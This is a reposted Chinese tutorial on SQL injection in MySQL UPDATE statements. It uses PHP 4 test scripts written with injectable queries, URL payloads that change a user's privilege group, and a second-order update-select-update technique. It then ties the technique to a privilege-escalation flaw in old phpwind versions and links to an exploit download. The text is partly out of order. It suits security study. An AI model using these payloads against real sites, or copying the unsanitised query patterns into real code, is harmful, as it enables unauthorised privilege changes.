寂寞hack的文章,简单的介绍了一些注入方法,可以了解一下,但并没有那样的实用,经知道现在很多框架、代码都采用了PDO,使用了prepare的方法,基本上可以避免这些问题的发生。当然,光靠这些是不一定能够完全避免的,代码上还是要严格控制一下。
原文来自于:http://hi.baidu.com/isbx/blog/item/35d86a605b1fbf48eaf8f851.html
OS: Windowsxp sp2 二、测试数据库结构 三、测试模式 1、变量没有带''或""
一、测试环境
php: php 4.3.10
mysql 4.1.9
apache 1.3.33
http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查询:
- mysql> select * from userinfo;
- +---------+-------+--------+
- | groudid | user | pass |
- +---------+-------+--------+
- | 1 | heige | 123456 |
- +---------+-------+--------+
- 1 row in set (0.01 sec)
用户heige的groudid又2改为1了 :)
所以我们可以得到没有''或""update的注射是可以成功的,这个就是我们的模式1。
2、变量带''或""
- <?php
- //test2.php
- $servername = "localhost";
- $dbusername = "root";
- $dbpassword = "";
- $dbname = "test";
- mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
- $sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号
- $result = mysql_db_query($dbname, $sql);
- $userinfo = mysql_fetch_array($result);
- echo "<p>SQL Query:$sql<p>";
- ?>
为了关闭'我们构造$p应该为 123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1
在gpc=on的情况下'变成了\',提交的语句变成:
SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'
mysql查询:
- mysql> select * from userinfo;
- +---------+-------+--------------------+
- | groudid | user | pass |
- +---------+-------+--------------------+
- | 2 | heige | 123456',groudid='1 |
- +---------+-------+--------------------+
- 1 row in set (0.00 sec)
- <?php
- //test3.php Mod2
- $servername = "localhost";
- $dbusername = "root";
- $dbpassword = "";
- $dbname = "test";
- mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
- $sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号
- $result = mysql_db_query($dbname, $sql);
- mysql_fetch_array($result); //$p的数据写入数据库
- $sql= "select pass from userinfo where user='heige'";
- $result = mysql_db_query($dbname, $sql);
- $userinfo=mysql_fetch_array($result);
- echo $userinfo[0]; //把pass查询输出给$userinfo[0]
- $sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
- $result = mysql_db_query($dbname, $sql);
- mysql_fetch_array($result); //把$userinfo[0] 再次update
- ?>
http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
- mysql> select * from userinfo;
- +---------+-------+--------+
- | groudid | user | pass |
- +---------+-------+--------+
- | 1 | heige | 123456 |
- +---------+-------+--------+
- 1 row in set (0.00 sec)
update --> select --> update
四、实际模式
模式1:缺
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析
update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
↓
select (jop.php)
↓
updtate (jop.php)
Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe